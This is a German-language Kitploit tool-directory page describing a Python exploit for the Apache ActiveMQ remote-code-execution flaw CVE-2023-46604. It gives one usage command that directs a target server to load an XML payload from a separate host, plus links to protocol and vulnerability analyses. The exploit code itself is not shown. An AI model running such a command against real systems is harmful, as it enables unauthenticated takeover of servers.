Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-46604-Apache-ActiveMQ-RCE-exp — Python-basierter Remote-Code-Execution-Exploit für Apache ActiveMQ CVE-2023-46604, der das OpenWire-Protokoll nutzt, um XML-Payloads für nicht authentifizierte RCE zu übermitteln. | Kitploit
Tools/GitHubGitHub/justdoit-cai/cve-2023-46604-apache-activemq-rce-exp
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationRemote-Access-Tool
GitHubjustdoit-cai/cve-2023-46604-apache-activemq-rce-exp

CVE-2023-46604-Apache-ActiveMQ-RCE-exp

Python-basierter Remote-Code-Execution-Exploit für Apache ActiveMQ CVE-2023-46604, der das OpenWire-Protokoll nutzt, um XML-Payloads für nicht authentifizierte RCE zu übermitteln.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
51vor 2 JahrenNoch nicht geprüft
Teilen

Projekt-Referenz

Dieses Projekt ist ein in Python umgeschriebenes exp, basierend auf dem exp des Projekts https://github.com/X1r0z/ActiveMQ-RCE.

Verwendung

root@kitploit:~
python attack.py -u 192.168.163.129 -x http://192.168.163.133:10001/poc.xml -p 61616

Der Parameter -p ist standardmäßig der Standardport von activeMQ. Beachten Sie, dass dem Parameter -x das Protokollpräfix hinzugefügt werden muss.

Einführung

Hier ist ein Diagramm des openwire-Protokolls, das die Sache verdeutlicht.

Nachfolgend ist das Paketformat des Typs Throwable dargestellt.

Eine detaillierte Schwachstellenanalyse finden Sie in den untenstehenden Referenzartikeln.

Referenzartikel

root@kitploit:~
# openwire协议的分析
https://github.com/X1r0z
https://activemq.apache.org/openwire-version-2-specification
# CVE漏洞原理的分析
https://exp10it.cn/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/
Tool herunterladen